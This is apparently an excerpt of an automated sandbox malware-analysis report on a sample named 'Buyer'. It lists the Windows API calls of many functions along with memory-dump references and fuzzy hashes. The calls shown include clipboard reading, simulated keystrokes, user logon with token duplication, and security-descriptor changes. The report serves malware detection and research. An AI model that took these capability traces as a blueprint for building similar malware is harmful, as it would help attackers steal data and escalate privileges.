                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 826c83c5651f6f41bdbfcb07b43f4fcc60db57ed6d7ac4c6648ee097df44f51e
                                                                                                    • Instruction ID: 8a64a9a6960ebf74f599dd28612899647eaf9af93b4d13e112719cff01d15d98
                                                                                                    • Opcode Fuzzy Hash: 826c83c5651f6f41bdbfcb07b43f4fcc60db57ed6d7ac4c6648ee097df44f51e
                                                                                                    • Instruction Fuzzy Hash: F8F0E572A08A045AFF359A749805B62B7D4BB01722F20495AD9C581181DBB95494B7A1
                                                                                                    Function 00F456AA Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                                                                    • Instruction ID: fc6f04eb27deb2b98beaad7395cb60355492de5084e02064353c2b6e3ca385fe
                                                                                                    • Opcode Fuzzy Hash: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                                                                    • Instruction Fuzzy Hash: 92F0F87640020DFFDF05DF90C941EAE7BB9FB14318F208545F9159A151D336EA61EBA1
                                                                                                    Function 00F42F14 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F42F70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1144537725-0
                                                                                                    • Opcode ID: 33f422d48ee304d305c4f2c6b63f0f654af8beab8c8ea23f1445bfec2e589959
                                                                                                    • Instruction ID: 33f2cbf7f10e63f26727c1ce0a107ed8fdee25197ade573dfb45b9e72994806f
                                                                                                    • Opcode Fuzzy Hash: 33f422d48ee304d305c4f2c6b63f0f654af8beab8c8ea23f1445bfec2e589959
                                                                                                    • Instruction Fuzzy Hash: 5DF0A0709043489FDBA2DF24EC4A7967BFCA701708F1440A9A68896186DB794B88CF41
                                                                                                    Function 00F4318A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F431A9
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 541455249-0
                                                                                                    • Opcode ID: 7d71a650b0935d445a4bc9731d322da9ac08c15db89097f555bcda58c23c9538
                                                                                                    • Instruction ID: 0ab932846d9415d2f20a13ac35fe37714227464aede484201f557a2e12969e38
                                                                                                    • Opcode Fuzzy Hash: 7d71a650b0935d445a4bc9731d322da9ac08c15db89097f555bcda58c23c9538
                                                                                                    • Instruction Fuzzy Hash: BBE0CD725002245BC711E258DC06FEA77DDDFC8790F040071FC05D7354D964ED809690
                                                                                                    Function 00F42825 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F43A5A
                                                                                                      • Part of subcall function 00F4DCC0: GetInputState.USER32 ref: 00F4DDA7
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F42853
                                                                                                      • Part of subcall function 00F42F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F42F70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                    • String ID:
                                                                                                    • API String ID: 3667716007-0
                                                                                                    • Opcode ID: f6d77a71540daeef3d92208e7d3e7d320b173987164a6ddd702669c3044036b6
                                                                                                    • Instruction ID: 82ea3329aed6dc3c3e330cac3389946efae0f499d162134a31ae5d6589526a78
                                                                                                    • Opcode Fuzzy Hash: f6d77a71540daeef3d92208e7d3e7d320b173987164a6ddd702669c3044036b6
                                                                                                    • Instruction Fuzzy Hash: 9CE0CD62F4414817CA4CBB70BC51A7DFF65DBD0324F80153FFA4342152CE2C4948A352
                                                                                                    Function 00F806ED Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00F80A57,?,?,00000000,?,00F80A57,00000000,0000000C), ref: 00F8070A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 2f276eb602d8734256168a95cfd5d8da4bf99556ecdb6e83a5c27c480b80caa8
                                                                                                    • Instruction ID: 99dc7b735ebae40ed77b9ff02e994d4e180a4592f5a12b9bd5503f9135ebdafb
                                                                                                    • Opcode Fuzzy Hash: 2f276eb602d8734256168a95cfd5d8da4bf99556ecdb6e83a5c27c480b80caa8
                                                                                                    • Instruction Fuzzy Hash: 42D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E821AB90
                                                                                                    Function 00FAE7DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 6e044287d6af3972c36ce51182c04fa35fd7490db6fb16da17b3fbad74cdb612
                                                                                                    • Instruction ID: 3c8e0c8107ce52fcc830ab35c506973be6fd924fc29badf7413bfc3748aaf940
                                                                                                    • Opcode Fuzzy Hash: 6e044287d6af3972c36ce51182c04fa35fd7490db6fb16da17b3fbad74cdb612
                                                                                                    • Instruction Fuzzy Hash: EAB092B840160005AD284A385A080A933026843BBA7D81B80F5BA850F1833D880BF610
                                                                                                    Function 00F41727 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F41736
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3098949447-0
                                                                                                    • Opcode ID: d5f539c6cb4246cfd9a10e503935557da952c02038a19a734363f79f5f13ef32
                                                                                                    • Instruction ID: 08fdd9482d1d95def8b79a966a53dcaa58bca34f88d214c4a6adacb537778135
                                                                                                    • Opcode Fuzzy Hash: d5f539c6cb4246cfd9a10e503935557da952c02038a19a734363f79f5f13ef32
                                                                                                    • Instruction Fuzzy Hash: 41C09B312802049FE3305750BD4AF14F755A304B10F10C403B645591D7C3BB5410EB10
                                                                                                    Function 00FB6376 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAD98E: FindFirstFileW.KERNEL32(?,?), ref: 00FADA05
                                                                                                      • Part of subcall function 00FAD98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 00FADA55
                                                                                                      • Part of subcall function 00FAD98E: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FADA66
                                                                                                      • Part of subcall function 00FAD98E: FindClose.KERNEL32(00000000), ref: 00FADA7D
                                                                                                    • GetLastError.KERNEL32 ref: 00FB6398
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2191629493-0
                                                                                                    • Opcode ID: 4684e68b6cc53d0fcc2285fbb4a837a3fc7b5a84478a223936066b3541ed8a80
                                                                                                    • Instruction ID: 27cc246d56c1385e0e7df474184b5e078a303216928525867d73cca132e801ad
                                                                                                    • Opcode Fuzzy Hash: 4684e68b6cc53d0fcc2285fbb4a837a3fc7b5a84478a223936066b3541ed8a80
                                                                                                    • Instruction Fuzzy Hash: 60F08C322106048FCB10FF59D850B6ABBE5AF48B20F088449F94A9B352CB78BC01AB91

                                                                                                    Non-executed Functions

                                                                                                    Function 00F5F64C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F5F656
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5F673
                                                                                                    • IsIconic.USER32(00000000), ref: 00F5F67C
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F68E
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F6A4
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F5F6AB
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F6B7
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F6C8
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F6D0
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F5F6D8
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F6DB
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F6F4
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F6FF
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F709
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F70E
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F717
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F71C
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F726
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F5F72B
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F5F72E
                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F5F74C
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000000), ref: 00F5F754
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00F5F75C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 1155518417-2988720461
                                                                                                    • Opcode ID: 27e59b3b147b2a2e8043e218f80f82ffdd0f0181e70313d1a1e94db8cb35092b
                                                                                                    • Instruction ID: f0df3842e1df1b2a1f5f635872c5649dd128f4155dd50cc188c9c20fcc0324c7
                                                                                                    • Opcode Fuzzy Hash: 27e59b3b147b2a2e8043e218f80f82ffdd0f0181e70313d1a1e94db8cb35092b
                                                                                                    • Instruction Fuzzy Hash: 7F31A371A8121CBAEB202BB55C4AF7F3F6DEB44B55F140066FB00E61D1D6B15D04BAA0
                                                                                                    Function 00FA18E3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1DEF
                                                                                                      • Part of subcall function 00FA1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA1E1C
                                                                                                      • Part of subcall function 00FA1DA5: GetLastError.KERNEL32 ref: 00FA1E2C
                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00FA1968
                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00FA198A
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FA199B
                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FA19B3
                                                                                                    • GetProcessWindowStation.USER32 ref: 00FA19CC
                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00FA19D6
                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FA19F2
                                                                                                      • Part of subcall function 00FA17A1: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA18DE), ref: 00FA17B6
                                                                                                      • Part of subcall function 00FA17A1: CloseHandle.KERNEL32(?,?,00FA18DE), ref: 00FA17CB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                    • String ID: $default$winsta0
                                                                                                    • API String ID: 22674027-1027155976
                                                                                                    • Opcode ID: d89179f7461baae52d496241bc32e753dd05edf7dbf5612aa0090900f0e73b0c
                                                                                                    • Instruction ID: 6b2c7557388e6d7e8bcbfa830a577c9ef636367ff295b1915a189167dd07c270
                                                                                                    • Opcode Fuzzy Hash: d89179f7461baae52d496241bc32e753dd05edf7dbf5612aa0090900f0e73b0c
                                                                                                    • Instruction Fuzzy Hash: 93818CB1901208AFEF119FA4CC49FEE7BB9FF4A350F15412AF910A61A0E7358955EB60
                                                                                                    Function 00FA1244 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                      • Part of subcall function 00FA17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                      • Part of subcall function 00FA17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                      • Part of subcall function 00FA17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA12AE
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA12E2
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA12F9
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FA1333
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA134F
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA1366
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA136E
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FA1375
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA1396
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FA139D
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA13CC
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA13EE
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA1400
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1427
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA142E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1437
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA143E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1447
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA144E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA145A
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1461
                                                                                                      • Part of subcall function 00FA1875: GetProcessHeap.KERNEL32(00000008,00FA1293,?,00000000,?,00FA1293,?), ref: 00FA1883
                                                                                                      • Part of subcall function 00FA1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA1293,?), ref: 00FA188A
                                                                                                      • Part of subcall function 00FA1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA1293,?), ref: 00FA1899
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 150dc9611620732a3b17d8db3f9507782f1b2033495b1f721fe7d9df5534e31d
                                                                                                    • Instruction ID: dd19d4ee77299e3a41183d6e1445528d069df184e7ce921814d00cdbf078c33f
                                                                                                    • Opcode Fuzzy Hash: 150dc9611620732a3b17d8db3f9507782f1b2033495b1f721fe7d9df5534e31d
                                                                                                    • Instruction Fuzzy Hash: E7715CB2D00219BBEF10DFA4DC48FAEBBB9FF0A360F058125E915A7191D7719A05DB60
                                                                                                    Function 00FBF286 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00FDDC1C), ref: 00FBF2B0
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FBF2BE
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00FBF2CA
                                                                                                    • CloseClipboard.USER32 ref: 00FBF2D6
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF30E
                                                                                                    • CloseClipboard.USER32 ref: 00FBF318
                                                                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00FBF343
                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00FBF350
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00FBF358
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF369
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 00FBF3A9
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00FBF3BF
                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00FBF3CB
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00FBF3DC
                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00FBF3FE
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBF41B
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBF459
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00FBF47A
                                                                                                    • CountClipboardFormats.USER32 ref: 00FBF49B
                                                                                                    • CloseClipboard.USER32 ref: 00FBF4E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
